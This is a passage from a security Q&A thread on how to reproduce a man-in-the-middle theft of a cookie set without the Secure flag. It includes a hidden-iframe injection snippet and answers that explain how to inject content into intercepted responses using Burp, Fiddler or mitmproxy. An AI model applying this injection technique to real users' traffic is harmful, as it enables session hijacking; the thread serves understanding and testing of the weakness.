3

So, I am trying to obtain a cookie without the secure flag enabled over HTTPS. After reading about it, I came across an answer:

  1. You visit https://secure.example.com/ which drops a cookie on your browser.

  2. You then visit http://www.msn.com/ however a MITM inserts:

    <div style='visibility:hidden'>
   <iframe src='http://secure.example.com/'></iframe>
<div>

  3. MiTM sniffs your cookie from the request on the iframe

I am currently trying to duplicate the above steps.

Using a proxy tool like Burp, I am able to obtain the cookies and all header information. I am wondering, how do I insert an iframe with a HTTP website as a request?

Am I using the wrong tool?

TildalWave
  • 10,801
  • 11
  • 45
  • 84
adbarads
  • 129
  • 3
  • 1
    AFAIK, Burp Suite already has an HTTP editor which allows you to do that, or you can [use Fiddler to modify and inject HTML](http://stackoverflow.com/questions/1933934/injecting-javascript-to-website-using-fiddler). – Adi Jun 04 '13 at 16:01
  • This tool might be more useful for you https://github.com/cortesi/mitmproxy – Vitaly Osipov Jun 05 '13 at 07:17

1 Answers1

3

You can do this using the Proxy tool (tab) of Burp. Just be sure that you added the host (msn.com in this case) to the Scope and check the "Intercept server responses..." check box on the Options tab (under Proxy).

This way all the server responses will be displayed on the Intercept tab where you can place arbitrary content in them.

You can also use the automatic Match and Replace feature under Proxy/Options.

http://portswigger.net/burp/help/proxy.html

buherator
  • 1,730
  • 1
  • 9
  • 15